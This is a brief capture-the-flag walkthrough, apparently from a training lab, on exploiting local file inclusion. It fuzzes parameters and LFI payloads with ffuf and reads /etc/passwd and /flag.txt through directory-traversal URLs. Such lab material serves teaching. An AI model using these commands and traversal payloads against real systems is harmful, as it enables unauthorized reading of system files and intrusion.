Automated Scanning

Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt

Step 1 - Fuzz parameters:

  • Use the burp-parameter-names.txt wordlist with the following command:

    • ffuf -w burp-parameter-names.txt:FUZZ -u 'http://SERVER_IP:SERVER_PORT/index.php?FUZZ' -fs 2309

Step 2 - Fuzz LFI payloads:

  • Use the LFI-Jhaddix.txt wordlist:

    • ffuf -w LFI-Jhaddix.txt:FUZZ -u 'http://SERVER_IP:SERVER_PORT/index.php?view=FUZZ' -fs 1935

Step 3 - Test one of the discovered payloads:

  • Append the payload to the application URL:

    • http://SERVER_IP:SERVER_PORT/index.php?view=../../../../../../../../../../../../../../../../../../../../../../etc/passwd

Step 4 - Get the flag:

  • Now simply substitute /etc/passwd for /flag.txt

    • ../../../../../../../../../../../../../../../../../../../../../../flag.txt

And flag found!

Last updated